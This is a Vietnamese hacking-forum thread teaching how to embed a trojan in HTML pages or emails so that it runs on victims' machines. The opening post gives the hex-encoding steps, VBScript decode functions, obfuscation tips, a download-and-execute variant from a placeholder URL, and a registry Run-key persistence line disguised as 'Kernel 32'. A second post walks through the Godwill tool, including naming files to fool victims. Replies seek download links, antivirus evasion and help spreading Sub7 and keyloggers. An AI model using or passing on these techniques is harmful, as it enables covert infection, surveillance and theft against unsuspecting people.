Latest posts for the topic "Kĩ thuật gắn Trojan vào file HTML "

Kĩ thuật gắn Trojan vào file HTML

legendayhacker — GMT

Tác giả:Một ai đó Xin lỗi vì không rõ tác giả là ai. Vậy ai biết tác giả bài này thì điền hộ vào mục tác giả. Kĩ thuật gắn Trojan vào file HTML Bạn muốn chạy tự động 1 trojan trên máy tính người khác khi họ xem trang Web hoặc Email của bạn...! Có cách nào không??? Dĩ nhiên là được rồi! Bài viết này sẽ giúp bạn giải quyết vấn đề! 1) Hướng dẫn: · Bước 1: chuẩn bị một file trojan.exe, kích thước khoảng 5 - 40Kb. Nếu bạn không có trojan, bạn có thể tải về từ trang TlSecurity.com hoặc tự viết một file trojan.exe để xài! · Bước 2: chạy convert16.exe để convert file trojan.exe sang trojan.hex · Bước 3: dùng 1 trình soạn thảo văn bản dạng text( nên dùng EditPlus, nó rất hay!) để sửa file temp.htm như sau: Thay phần .doc=”4D5A900... 64620000” thành .doc=”<đặt nội dung của file trojan.hex vào đây>” VD: .doc=”9631447da55abcd44ac25...” · Bước 4: Nhúng file nội dung file temp.htm sau khi sửa vào trang Web hoặc Email và gởi đến cho người khác! 2) Mã nguồn: · Files: § tempsrc.hta dùng để extract và execute trojan.exe § tempsrc.htm file htm chính § convert16.vbp & convert16.frm : file nguồn của chương trình Convert 16, được viết bằng Visual Basic 6, dùng để convert file .exe sang file .hex · Những vấn đề chính: § Kĩ thuật ‘Convert 16’: dùng để tạo 1 file nhị phân, ví dụ như trojan.exe Chuyển mã ANSI của kí tự sang hệ cơ số 16 hexa. Từ mã ANSI của kí tự ở hệ 16 chúng ta dễ dàng chuyển về lại kí tự ban đầu. Để dễ hiểu, tôi đưa ra ví dụ sau: Kí tự L P T V C l u b 2 0 0 1 Mã ANSI ở hệ 10 76 80 84 86 32 67 108 117 98 32 50 48 48 49 Mã ANSI ở hệ 16 4C 50 54 56 20 43 6C 75 62 20 32 30 30 31 Encode16 Decode16 “LPTV Club 2001” “4C50545620436C75622032303031” “LPTV Club 2001” ‘--- VBScript Code --- function encode16(st) for i = 1 to len(st) temp = hex((asc(mid(st,i,1))) ‘ mid(st,i,1) lấy 1 kí tự trong chuổi st ở vị trí thứ i ‘ asc(mid(st,i,1)) trả về mã ANSI của kí tự này ‘ temp = hex((asc(mid(st,i,1))) sẽ chứa mã ANSI ở hệ 16 của kí tự if len(temp) = 1 then ‘vì mã ANSI của kí tự chỉ nằm trong khoảng từ 0 đến 255 (0h-FFh), nên nếu độ dài của temp=1 chúng ta sẽ thêm 0 vào trước! Ví dụ: 0A, 07, ... temp =”0” & temp end if encode16 = encode16 & temp next end function function decode16(st) for i =1 to len(st) step 2 ‘như ở trên, mỗi kí tự được mã bằng đúng 2 kí tự nên bước nhảy step = 2 decode16 = decode16 & chr(“&h” & mid(st,i,2)) ‘ mid(st,i,2) trả về 1 chuổi gồm 2 kí tự, bắt đầu từ vị trí thứ i trong chuổi ‘chr(“&h” & mid(st,i,2)) trả về kí tự có mã ANSI ở hệ 16; “&h” dùng để chỉ hệ 16 next end function ‘--- VBScript Code --- § Kĩ thuật ‘Encode’: được sử dụng trong file temp.hta & temp.htm ü Mục đích: + giảm kích thước file + làm cho mã lệnh khó đọc đối với người khác ü Ví dụ: thay vì viết lệnh rõ ràng: on error resume next dn=chr(34) xd=vbcrlf set wsh=createobject("wscript.shell") set fso=createobject("scripting.filesystemobject") Chúng ta cũng có thể viết lại như sau: on error resume nextj=chr(34)q=vbcrlfset g=createobject("wscript.shell")set t6=createobject("scripting.filesystemobject") Bạn thấy mã lệnh nhỏ hơn trước và có khó đọc không? 3) Hỏi/Đáp: · Có thể gắn virus hoặc 1 chương trình khác thay cho trojan không? Dĩ nhiên là được rồi! Bạn thử nghĩ lại xem, file virus, trojan.exe hầu như đều là các file .exe chương trình có khả năng tự thực thi nên bạn hoàn toàn có thể thay đổi theo ý muốn của bạn! · Nếu tôi gắn 1 file trojan.exe lớn trong file temp.html , file này sẽ lớn kinh khủng, người khác có thể nghi ngờ! Vậy làm sao bây giờ? · Tôi muốn máy họ tự động download file trojan.exe từ trên mạng về và execute nó? Có được không? Rất dễ! Thay vì phải gắn file trojan.exe, chúng ta sẽ gắn 1 file chương trình nhỏ khoảng 5 KB. Nhiệm vụ của file này là download trojan.exe từ http://www.somewhere.com/yoursite/trojan.exe và thi hành nó! Bạn nên sửa lại mã của file .hta một chút!: bỏ lệnh xóa file temp.exe và thêm lệnh tạo registry-startup cho file temp.exe! ... wsh.regwrite “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Kernel 32”,filetrojan ... Bạn có thể sử dụng chương trình Web Dowloader để giải quyết vấn đề trên! Tôi có gởi kèm chương trình Web Dowloader trong tập hướng dẫn này, file Webdownloader2.0.zip · Có thể chạy trojan.exe ngay sau khi người khác đọc trang Web hoặc Email mà không cần họ khởi động lại máy tính không? Hoàn toàn có thể được! Nhưng trong phạm vi bài viết này, tôi không muốn đề cập đến! Chúc các bạn thành công!

Kĩ thuật gắn Trojan vào file HTML

legendayhacker — GMT

Tác giả : Một ai đó Hướng dẫn sử dụng Godwill để gắn Trojan vào trang Web : Godwill là một chương trình khá hữu dụng và dễ sử dụng dành cho mụch đích gắn kèm 1 file .exe( trojan) vào một trang web (htm.html) Cách dùng xin tóm tắt như sau: ---===--- chạy chương trình chọn enter sau đó chọn nut "html" trong các nút ở dưới cùng cửa sổ godwill Chọn "general options ( hinh 1 ) +enter exe file: path tới file trojan ( k2ps.exe ) +enter .html : trang web mà mình đã thiết kế +enter output :tên trang web có đính mã godmessage ( ví dụ là : xxx.html thì sau khi hoàn tất sẽ xuất hiện file xxx.html ttrong thư mục godwill ,trang web này đã đính trojan không được mở +các tuỳ chọn khác là dùng để thông báo về đường ICQ ...nếu là newbie thì không cần để ý cũng được ... +browser wwwection : sau khi đọc trang web victim sẽ được chuyển về trang http://www.yahoo.com cung duoc +HTA filename : sau khi xem trang web ,trong start-up của victim sẽ xuất hiện một file .HTA ,đặt tên file đó sao cho có vẻ "microsoft"một chút để victim khỏi nghi ngờ ( vd: msreg ) +sau đó chọn done +phần advanced option không cần để ý cũng được. +muốn save config hay không là tuỳ ý nhấn nút có chữ "GEN" trang web có đính trojan sẽ được tạo ra Have fun ! PS: trong godwill còn tích hợp một số tiện ích khác , các bạn tự tìm hiểu xem !!!

Kĩ thuật gắn Trojan vào file HTML

canhnguyen — GMT

Bài này trong CD Viethacker ^^ không nhớ tác giả.

Kĩ thuật gắn Trojan vào file HTML

hanhluckyly — GMT

Bạn legendayhacker mến lỡ như mình có một con trojan có kích thước lớn hơn thì không thể dùng godwill được bạn có chương trình nào khác không? ý mình là mình dùng con cs keyloggger ở chủ đề bên kia để nhúng vào godwill ấy nhưng nó báo là kích thước lớn hơn quy định Cám ơn bạn rất nhiều

Re: Kĩ thuật gắn Trojan vào file HTML

lonely_Xorhandsome — GMT

bài viết này của anh Lê Phạm Tuấn Vinh ( sinh vien báo chí) ! mình có đọc qua bài này lâu rồi không chú ý tới nó lằm hôm nay đọc lại thấy cũng hay hay , nhưng có điều mình thử tìm trong google chuong trình convert từ file EXE sang HEX ra nhiều kết wả tùm lum wa' bạn có thì share cho mọi người được không ạ ? , còn cái file temp.htm mà bạn nói đó là 1 file tạm khi làm việc với Editor phải không ? nhưng cụ thể là editor đang làm việc với file nào mà phát sinh ra file temp ? không lẽ file temp của 1 file HTML bất kì nào đó hả ??? mong bạn giải thích luôn a.! cảm ơn về bài viết .

Kĩ thuật gắn Trojan vào file HTML

ghostshadow189 — GMT

bạn à , bạn test cái cách này chưa vậy , có okie ko ???

Kĩ thuật gắn Trojan vào file HTML

romeowillkiss — GMT

Cách này giờ ko còn dùng được nữa còn đòi hỏi victim có bật ActiveX ko nữa chứ , nếu victim ko bấm ok thì sao? Notor Anti - Virus liệu có cho chạy ko? sử dụng Trình duyệt Khác IE thì sao?

Kĩ thuật gắn Trojan vào file HTML

ZzzRockzzZ — GMT

legendayhacker wrote:

Tác giả : Một ai đó Hướng dẫn sử dụng Godwill để gắn Trojan vào trang Web : Godwill là một chương trình khá hữu dụng và dễ sử dụng dành cho mụch đích gắn kèm 1 file .exe( trojan) vào một trang web (htm.html) Cách dùng xin tóm tắt như sau: ---===--- chạy chương trình chọn enter sau đó chọn nut "html" trong các nút ở dưới cùng cửa sổ godwill Chọn "general options ( hinh 1 ) +enter exe file: path tới file trojan ( k2ps.exe ) +enter .html : trang web mà mình đã thiết kế +enter output :tên trang web có đính mã godmessage ( ví dụ là : xxx.html thì sau khi hoàn tất sẽ xuất hiện file xxx.html ttrong thư mục godwill ,trang web này đã đính trojan không được mở +các tuỳ chọn khác là dùng để thông báo về đường ICQ ...nếu là newbie thì không cần để ý cũng được ... +browser wwwection : sau khi đọc trang web victim sẽ được chuyển về trang http://www.yahoo.com cung duoc +HTA filename : sau khi xem trang web ,trong start-up của victim sẽ xuất hiện một file .HTA ,đặt tên file đó sao cho có vẻ "microsoft"một chút để victim khỏi nghi ngờ ( vd: msreg ) +sau đó chọn done +phần advanced option không cần để ý cũng được. +muốn save config hay không là tuỳ ý nhấn nút có chữ "GEN" trang web có đính trojan sẽ được tạo ra Have fun ! PS: trong godwill còn tích hợp một số tiện ích khác , các bạn tự tìm hiểu xem !!!

Godwill có hiệu lực với IE 6.0 ?! :roll: :!:

Kĩ thuật gắn Trojan vào file HTML

trojon — GMT

Bài viết này có rất nhiều trên mạng cám ơn bạn đã share

Kĩ thuật gắn Trojan vào file HTML

Master_ran — GMT

cái này giờ còn dùng được sao hic> chít liền kiếm cái WMF đoá :d

Re: Kĩ thuật gắn Trojan vào file HTML

HọcHackĐểHackBạnGái — GMT

Xin hỏi cái file temp.htm nó nằm ở đâu vậy?

Kĩ thuật gắn Trojan vào file HTML

louisenguyen — GMT

hay hay em se thử :D

Kĩ thuật gắn Trojan vào file HTML

tuanlq1 — GMT

cách này giờ hơi khó,nhưng tỉ lệ thành công chắc cũng dc 1-2 % ^_^

Kĩ thuật gắn Trojan vào file HTML

trojon — GMT

Trước khi nhận xét 1 bài viết nào đó các bạn nên test thử xem thế nào.

Re: Kĩ thuật gắn Trojan vào file HTML

Loyal — GMT

cái này cũ rích rồi :D) với tốc độ phát triển như bây giờ thì khó áp dụng được lắm :lol:)

Kĩ thuật gắn Trojan vào file HTML

dbvn — GMT

ko down dc godwill nen chưa thử dc, có ai có, xin cho link down coi thử nó lợi hại đến đâu

Kĩ thuật gắn Trojan vào file HTML

boyhuesd — GMT

Em thấy một số site tự động down trojan về và chạy luôn, nếu mình không có cái cái avant browser cũng không thể biết được (ngay cả windows scurity0 cũng bó tay, mấy bác biết cách làm này khôn, xin chỉ giáo cho em

Kĩ thuật gắn Trojan vào file HTML

mgdaubo — GMT

Vấn đề này mình thắc mắc lâu nay,virus thì đã viết xong mà cách lây nhiễm từ web thì tìm mãi chỉ thấy mấy cái cũ rích,bị fix lâu rồi. Pa nào giúp với

Kĩ thuật gắn Trojan vào file HTML

legendayhacker — GMT

dbvn wrote:

ko down dc godwill nen chưa thử dc, có ai có, xin cho link down coi thử nó lợi hại đến đâu

Đây link đây bạn thử coi .Tôi không khuyến khích bạn phá hoại hãy thử nên chính mình trước để xem kết quả là tốt nhất và để hiểu rõ cách thức của nó http://www.remoteassessment.com/darchive/190982017.html chúc vui

Kĩ thuật gắn Trojan vào file HTML

microsoft_hn — GMT

Em cần hỏi rõ thêm một số điều nữa . Em nhấn mnhj là hỏi rõ thêm vì đa số mọi người là newbie mà anh mong anh chỉ bảo tận tình .Em định up con SUb7 lên host free của em trong phần data base !! Bây giờ không nhúng trojan vào nữa mà em muốn nhứng 1 đoạn code thực thi lệnh tự download trojan từ host free của em . và tự chạy trong HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Kernel 32 được Và máy victim có phát hiện ra trong quá trình download không . trong quá trình down và khi down về rùi mà họ có trương trình quét VR thì sao? khả năng có bị died con VR của mình không?? Rất dễ! Thay vì phải gắn file trojan.exe, chúng ta sẽ gắn 1 file chương trình nhỏ khoảng 5 KB. Nhiệm vụ của file này là download trojan.exe từ http://www.somewhere.com/yoursite/trojan.exe và thi hành nó! Bạn nên sửa lại mã của file .hta một chút!: bỏ lệnh xóa file temp.exe và thêm lệnh tạo registry-startup cho file temp.exe! ... wsh.regwrite “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Kernel 32”,filetrojan ... Bạn có thể sử dụng chương trình Web Dowloader để giải quyết vấn đề trên! Tôi có gởi kèm chương trình Web Dowloader trong tập hướng dẫn này, file Webdownloader2.0.zip

Kĩ thuật gắn Trojan vào file HTML

microsoft_hn — GMT

em muốn anh chỉ rõ hơn

Kĩ thuật gắn Trojan vào file HTML

peterhiep — GMT

Anh ơi em kô hiểu rõ lắm anh có thể chỉ rõ hơn một chút xíu được kô

Kĩ thuật gắn Trojan vào file HTML

peterhiep — GMT

Mấy anh có thể chỉ em cách đính một con spy hay trojan vào một Website được kô em rất đang cần

Re: Kĩ thuật gắn Trojan vào file HTML

com_hacker — GMT

Hic mấy anh ơi Mấy cách nay em thử cả rồi nhưng không hiểu vì sao máy mình thì nó nhiễm lung tung còn máy net thì im re VB script chắc không hiệu lực :mrgreen: